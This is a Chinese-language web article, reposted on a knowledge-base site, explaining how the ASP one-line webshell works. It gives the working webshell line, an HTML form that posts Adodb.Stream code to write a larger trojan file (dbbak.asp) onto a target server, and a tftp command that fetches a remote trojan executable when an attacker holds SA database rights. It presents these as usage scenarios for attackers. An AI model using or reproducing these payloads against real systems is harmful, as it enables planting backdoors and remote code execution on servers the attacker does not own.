主頁 > 知識庫 > asp一句話木馬原理分析

asp一句話木馬原理分析
熱門標(biāo)簽:無營業(yè)執(zhí)照地圖標(biāo)注教學(xué) 滴滴地圖標(biāo)注上車點 地圖標(biāo)注還可以做嗎 硅基電話機器人加盟 宿州防封外呼系統(tǒng)平臺 友邦互聯(lián)電銷機器人違法嗎 電銷機器人采購 高質(zhì)量的電銷外呼系統(tǒng) 外呼系統(tǒng)怎么話費

通過HTTP協(xié)議來訪問
一句話木馬的使用范圍(我只列舉了2種):

1)只有數(shù)據(jù)庫備份的情況
數(shù)據(jù)庫備份成asp文件時候,不出現(xiàn)“ 編譯錯誤,缺少腳本關(guān)閉標(biāo)志%>"

2)SA權(quán)限的時候,一般先寫入一句話,圖個方便..(當(dāng)然,直接tftp上傳鴿子運行,那更快)

tftp -i ip get server.exe


一句話木馬%execute request("a")%>的原理:

首先知道
execute()函數(shù),是用來執(zhí)行asp代碼的.就是負(fù)責(zé)執(zhí)行我們上傳的大馬,將馬交由asp.dll解析.上面的代碼%execute request("a")%>可以這樣來解釋:


if request("a")>"" then execute request("a") 
%>

如果a不為空的時候執(zhí)行.執(zhí)行什么呢?...

if a != 0

下面我們來看一下客戶端:

form action=http://192.168.0.28/shell.asp method=post> 
textarea name=l cols=120 rows=10 width=45> 
set lP=server.CreateObject("Adodb.Stream") '創(chuàng)建Adodb.Stream組件..
lP.Open 
lP.Type=2 
lP.CharSet="gb2312" 
lP.writetext request("p") 
lP.SaveToFile server.mappath("dbbak.asp"),2 
lP.Close 
set lP=nothing 
response.redirect "dbbak.asp" 
/textarea> 
textarea name=p cols=120 rows=10 width=45>要提交的數(shù)據(jù)/textarea>BR>center>br> 
input type=submit value=提交>


Adodb.Stream負(fù)責(zé)上傳讀取數(shù)據(jù)到服務(wù)器:

組件:"Adodb.Stream" 
有下列方法: 
Cancel 方法 
使用方法如下 
Object.Cancel 
說明:取消執(zhí)行掛起的異步 Execute 或 Open 方法的調(diào)用。


WriteText 方法 
使用方法如下: 
Object.Write(Data,[Options]) 
說明:將指定的文本數(shù)據(jù)裝入對像中。 
參數(shù)說明:Data 為指定的要寫入的內(nèi)容。 
Options 寫入的選項,可不指定,可選參數(shù)如下: 
adWriteChar =0 
adWriteLine =1

SaveToFile 方法 
使用方法如下: 
Object.SaveToFile(FileName,[Options]) 
說明:將對像的內(nèi)容寫到FileName指定的文件中

也就是我們保存木馬的文件名dbbak.asp 
參數(shù)說明:FileName指定的文件 
Options 存取的選項,可不指定,可選參數(shù)如下: 
adSaveCreateNotExist =1 
adSaveCreateOverWrite =2

提交一句話木馬后,a的值為空 等待一個寫入的值 訪問http://www.***.com/**.asp就是等待的過程 如何準(zhǔn)備用execute()這個函數(shù)來執(zhí)行...

創(chuàng)建一個Adodb.Stream,負(fù)責(zé)把我們的大馬寫入到服務(wù)器當(dāng)中...

同時,這個組件定義的變量SaveToFile定義了我們大馬的名字..dbbak.asp

提交到服務(wù)器后execute()函數(shù)檢測到a的值不為空了,所以就執(zhí)行了我們的大馬!
您可能感興趣的文章:
  • 一句話木馬入侵EASYNEWS新聞管理系統(tǒng)
  • JSP一句話木馬代碼
  • asp.net jscript 一句話木馬
  • asp,php一句話木馬整理方便查找木馬
  • 一句話木馬的原理及利用分析(asp,aspx,php,jsp)
  • asp實現(xiàn)讀取數(shù)據(jù)庫輸出json代碼
  • 淺談ASP數(shù)據(jù)庫下載漏洞
  • ASP.NET列出數(shù)據(jù)庫活躍鏈接的方法
  • MySQL結(jié)合使用數(shù)據(jù)庫分析工具SchemaSpy的方法
  • ASP通過ODBC連接SQL Server 2008數(shù)據(jù)庫的方法
  • asp.net上傳文件到數(shù)據(jù)庫的解決方案
  • ASP語言實現(xiàn)對SQL SERVER數(shù)據(jù)庫的操作
  • asp控制xml數(shù)據(jù)庫的經(jīng)典代碼
  • ASP網(wǎng)站中數(shù)據(jù)庫被掛木馬的解決方案

標(biāo)簽:七臺河 宣城 江門 雅安 新余 儋州 廣元 錫林郭勒盟

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《asp一句話木馬原理分析》,本文關(guān)鍵詞  asp,一句話,木馬,原理,分析,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《asp一句話木馬原理分析》相關(guān)的同類信息!
  • 本頁收集關(guān)于asp一句話木馬原理分析的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章